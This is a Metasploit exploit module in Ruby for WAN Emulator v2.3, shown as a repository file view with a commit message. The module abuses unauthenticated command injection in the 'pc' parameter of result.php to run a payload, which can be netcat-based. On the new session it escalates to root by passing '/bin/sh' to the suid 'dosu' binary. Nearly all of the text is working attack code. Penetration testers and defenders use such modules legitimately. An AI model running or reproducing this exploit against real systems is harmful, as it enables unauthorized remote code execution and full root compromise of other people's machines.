sinn3r
230db6451b
The HttpClient mixin has a peer() method, therefore these modules should not have to make their own. Also new module writers won't repeat the same old code again.
114 lines
3.4 KiB
Ruby
114 lines
3.4 KiB
Ruby
##
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'WAN Emulator v2.3 Command Execution',
|
|
'Description' => %q{
|
|
This module exploits a command execution vulnerability in WAN Emulator
|
|
version 2.3 which can be abused to allow unauthenticated users to execute
|
|
arbitrary commands under the context of the 'www-data' user.
|
|
The 'result.php' script calls shell_exec() with user controlled data
|
|
from the 'pc' parameter. This module also exploits a command execution
|
|
vulnerability to gain root privileges. The 'dosu' binary is suid 'root'
|
|
and vulnerable to command execution in argument one.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Privileged' => true,
|
|
'Platform' => 'unix',
|
|
'Arch' => ARCH_CMD,
|
|
'Author' =>
|
|
[
|
|
'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
|
|
],
|
|
'References' =>
|
|
[
|
|
['OSVDB', '85344'],
|
|
['OSVDB', '85345'],
|
|
['URL', 'http://itsecuritysolutions.org/2012-08-12-wanem-v2.3-multiple-vulnerabilities/']
|
|
],
|
|
'Payload' =>
|
|
{
|
|
'Space' => 1024,
|
|
'BadChars' => "\x00\x22\x27",
|
|
'DisableNops' => true,
|
|
'Compat' =>
|
|
{
|
|
'PayloadType' => 'cmd',
|
|
'RequiredCmd' => 'generic netcat netcat-e',
|
|
}
|
|
},
|
|
'DefaultOptions' =>
|
|
{
|
|
'ExitFunction' => 'none'
|
|
},
|
|
'Targets' =>
|
|
[
|
|
['Automatic Targeting', { 'auto' => true }]
|
|
],
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => 'Aug 12 2012'
|
|
))
|
|
end
|
|
|
|
def on_new_session(client)
|
|
client.shell_command_token("/UNIONFS/home/perc/dosu /bin/sh")
|
|
end
|
|
|
|
def check
|
|
fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
|
|
data = "pc=127.0.0.1; "
|
|
data << Rex::Text.uri_encode("echo #{fingerprint}")
|
|
data << "%26"
|
|
print_status("#{peer} - Sending check")
|
|
|
|
begin
|
|
res = send_request_cgi({
|
|
'uri' => '/WANem/result.php',
|
|
'method' => 'POST',
|
|
'data' => data
|
|
}, 25)
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
print_error("#{peer} - Connection failed")
|
|
return Exploit::CheckCode::Unknown
|
|
end
|
|
|
|
if res and res.code == 200 and res.body =~ /#{fingerprint}/
|
|
return Exploit::CheckCode::Vulnerable
|
|
else
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
end
|
|
|
|
def exploit
|
|
data = "pc=127.0.0.1; "
|
|
data << Rex::Text.uri_encode(payload.raw)
|
|
data << "%26"
|
|
print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
|
|
begin
|
|
res = send_request_cgi({
|
|
'uri' => '/WANem/result.php',
|
|
'method' => 'POST',
|
|
'data' => data
|
|
}, 25)
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
print_error("#{peer} - Connection failed")
|
|
end
|
|
if res and res.code == 200
|
|
print_good("#{peer} - Payload sent successfully")
|
|
else
|
|
print_error("#{peer} - Sending payload failed")
|
|
end
|
|
end
|
|
|
|
end
|